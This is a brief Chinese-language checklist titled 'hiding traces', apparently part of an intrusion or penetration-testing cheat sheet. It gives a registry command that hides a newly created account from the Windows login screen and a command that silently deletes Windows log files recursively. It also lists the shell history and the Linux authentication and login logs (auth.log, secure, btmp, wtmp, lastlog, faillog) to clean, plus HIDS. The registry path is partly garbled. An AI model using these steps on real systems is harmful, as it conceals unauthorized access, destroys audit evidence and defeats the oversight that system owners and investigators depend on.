隐藏痕迹

  1. 禁止在登录界面显示新建帐号
  2. REG ADD “HKEY——LOCAL——MACHINE、SOFTWARE、Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /v uname /T REG_DWORD /D 0
  3. del %WINDIR%*.log /a/s/q/f
  4. History
  5. 日志
    • auth.log /secure
    • btmp / wtmp
    • lastlog / faillog
  6. 其他日志和HIDS等
文章目录
,